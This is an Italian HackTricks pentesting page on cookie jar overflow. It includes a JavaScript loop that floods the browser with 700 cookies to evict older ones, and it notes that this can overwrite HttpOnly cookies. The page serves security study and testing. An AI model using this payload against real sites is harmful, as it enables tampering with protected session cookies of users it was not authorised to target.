hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

3.1 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

I browser hanno un limite sul numero di cookie che possono memorizzare per una pagina. Quindi, se per qualche motivo hai bisogno di far scomparire un cookie, puoi sovraccaricare il barattolo dei cookie poiché i più vecchi verranno eliminati per primi:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Nota che i cookie di terze parti che puntano a un dominio diverso non verranno sovrascritti.

{% hint style="danger" %} Questo attacco può essere utilizzato anche per sovrascrivere i cookie HttpOnly poiché puoi eliminarli e poi reimpostarli con il valore che desideri.

Controlla questo in questo post con un laboratorio. {% endhint %}

{% hint style="success" %} Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks
{% endhint %}